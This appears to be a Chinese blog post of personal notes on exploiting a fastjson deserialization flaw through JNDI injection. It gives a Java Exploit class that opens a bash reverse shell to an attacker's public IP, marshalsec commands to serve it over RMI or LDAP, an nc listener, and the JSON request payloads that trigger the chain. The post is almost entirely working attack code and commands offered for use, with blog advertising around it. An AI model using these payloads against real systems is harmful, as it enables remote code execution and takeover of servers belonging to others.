如下文章说得很不详细,只是用于记录我的步骤,初次利用的人,建议找别的博客文章学习。

  1. 准备一台公网服务器
    cd test
    python -m SimpleHTTPServer 8888

    SRE实战 互联网时代守护先锋,助力企业售后服务体系运筹帷幄!一键直达领取阿里云限量特价优惠。

  2. javac Exploit.java
    里面的ip和端口改成你的

import javax.naming.Context;
import javax.naming.Name;
import javax.naming.spi.ObjectFactory;
import java.io.IOException;
import java.util.Hashtable;
 
 
public class Exploit{
    public Exploit() {}
 
    static
    {
        try {
            String[] cmds = System.getProperty("os.name").toLowerCase().contains("win")
                    ? new String[]{"cmd.exe","/c", "calc.exe"}
                    : new String[]{"bash", "-c", "/bin/bash -i >& /dev/tcp/【公网IP】/7778 0>&1"};
            Runtime.getRuntime().exec(cmds);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
 
    public static void main(String[] args) {
        Exploit e = new Exploit();
        System.out.println("hello world");
    }
}
  1. 上传到你的公网服务器
    Exploit.class
    marshalsec-0.0.3-SNAPSHOT-all.jar
# 有2个协议
RMI
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://【公网IP】/#Exploit 7776


LDAP
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://【公网IP】/#Exploit 7776
  1. 接受反弹shell的地方
nc -lvp 7778
  1. http请求
# ldap
{"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"lysec":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://【公网IP】:7776/Exploit","autoCommit":true}}

# rmi
{"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"lysec":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://【公网IP】:7776/Exploit","autoCommit":true}}
扫码关注我们
微信号:SRE实战
拒绝背锅 运筹帷幄